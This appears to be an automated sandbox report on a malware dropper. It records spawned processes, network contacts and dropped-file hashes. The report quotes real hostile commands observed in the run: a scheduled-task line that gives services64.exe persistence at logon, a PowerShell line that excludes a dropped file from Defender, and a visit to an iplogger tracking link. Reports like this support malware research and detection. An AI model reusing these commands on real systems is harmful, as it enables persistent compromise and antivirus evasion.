PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 1076 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\d1adee00a2745df94375ba4d0026c637_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 17e6077dcf7a402.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 61d1121b032c3d74.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f08378aa2c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c APPNAME55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0637ac7677d0cf7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c d5a6f77b01f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08280a9f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97c06d9b6fa6f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 432

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562940 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS6A38.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1580 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

Network

Country Destination Domain Proto
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.5.15:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
N/A 127.0.0.1:49264 tcp
N/A 127.0.0.1:49266 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 162.159.133.233:443 cdn.discordapp.com tcp
MD 176.123.2.239:80 176.123.2.239 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
BE 2.17.107.9:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 2.21.137.121:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
GB 142.250.178.3:80 c.pki.goog tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 97a16c7e8ab8b16125957a42033e7047
SHA1 6a4830c58f1cda695bf43b40e152f28e611f9bff
SHA256 760ce585eb4dd375c916e4fae47e013090e8ca19b4abae149484dfa9b7761111
SHA512 2efc118a860b130c2ca6a1029b5dfac28abb1a6f7d0c67744638aa6cb9be32f40afa6e3dd79b9db916926bc7cf3fb9feea170f28dc54a7e35da49dc89206ab44

\Users\Admin\AppData\Local\Temp\7zS434E1686\setup_install.exe

MD5 25eb7c88cb3002c4029dd7e1aec7f63b
SHA1 cf1bf4283ee16d0a94fc65c82233f9eb69b1db70
SHA256 152b187c8a5d36e4b7f7728a0ac261294790f84b269b6e872ef24d966bcc5ca2
SHA512 f0c627bcb6774253e7c3689265ae30241cb77b45aa0adf0434bb26c173ac43dfd188a6ac7b36a152d1c145afe34a73ea3f765a9892eff0d7b96960d47c58137d

\Users\Admin\AppData\Local\Temp\7zS434E1686\08280a9f8.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e010.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\17e6077dcf7a402.exe

MD5 3263859df4866bf393d46f06f331a08f
SHA1 5b4665de13c9727a502f4d11afb800b075929d6c
SHA256 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2
SHA512 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\f08378aa2c3.exe

MD5 7e51418ec90a49b4b6b3ce8e4ba26ba1
SHA1 9cc182ef14b4731d3c45930161afb0ee170d885c
SHA256 50c924e0f3b319b8f66278419f3c0dbd14c1c7d8d33e32d70ee1a959df30d4ae
SHA512 eadb844d9e570bc9339289a2dc4d5d76cc36ada19ff653af9e2a932d1aea083e33bebe65471637ff54e2ac8c36573bbcc243dd617d4391aef53a9fb184f41f7b

\Users\Admin\AppData\Local\Temp\7zS434E1686\0637ac7677d0cf7.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

\Users\Admin\AppData\Local\Temp\7zS434E1686\5d456d381f2e1.exe

MD5 6cae1487c1ba88b65eead225c280d78c
SHA1 e2624ce9267706b64ee724abe6e7dc8e1dcafd32
SHA256 d3cd0b6963c1b88ff327eee0953c9e30ed3fe4ed7cc198a949b285b626c237d6
SHA512 7bc375e863cc33a7f9c7b24a4c050a73d74a6cc5002713ec1fc3eed8760a8883dd4c7b9f0f3e9c008a71d66b692c4ff8620d574b0f48c0ce531d8f0d4e8fa45a

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\61d1121b032c3d74.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

\Users\Admin\AppData\Local\Temp\7zS434E1686\97c06d9b6fa6f9.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zS434E1686\d5a6f77b01f6.exe

MD5 7aaf005f77eea53dc227734db8d7090b
SHA1 b6be1dde4cf73bbf0d47c9e07734e96b3442ed59
SHA256 a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71
SHA512 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d

memory/2756-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2756-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2756-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2756-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2756-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2756-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2756-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2756-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2756-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2756-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS434E1686\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS434E1686\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2756-42-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS434E1686\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2756-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS434E1686\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS434E1686\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/1800-126-0x0000000001350000-0x0000000001358000-memory.dmp

memory/900-129-0x0000000001140000-0x000000000116C000-memory.dmp

memory/572-133-0x0000000000120000-0x000000000020E000-memory.dmp

memory/900-135-0x0000000000240000-0x0000000000246000-memory.dmp

memory/1408-132-0x0000000000400000-0x0000000002C6E000-memory.dmp

memory/2220-134-0x0000000000A70000-0x0000000000BB2000-memory.dmp

memory/900-136-0x0000000000360000-0x0000000000380000-memory.dmp

memory/900-137-0x0000000000380000-0x0000000000386000-memory.dmp

memory/1812-142-0x000000013FFA0000-0x000000013FFB0000-memory.dmp

memory/2156-146-0x0000000000E70000-0x0000000000F54000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1780-157-0x0000000000680000-0x0000000000764000-memory.dmp

memory/2756-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2756-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2756-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2756-165-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2756-164-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2756-163-0x0000000000400000-0x00000000009D2000-memory.dmp

memory/2220-169-0x0000000000370000-0x0000000000382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabD5B8.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2756-190-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2756-202-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarD6A5.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2756-195-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2756-192-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2756-186-0x0000000000400000-0x00000000009D2000-memory.dmp

memory/2756-187-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2924-216-0x0000000000400000-0x0000000002CC9000-memory.dmp

C:\ProgramData\softokn3.dll

MD5 a378c450e6ad9f1e0356ed46da190990
SHA1 d457a2c162391d2ea30ec2dc62c8fb3b973f6a66
SHA256 b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978
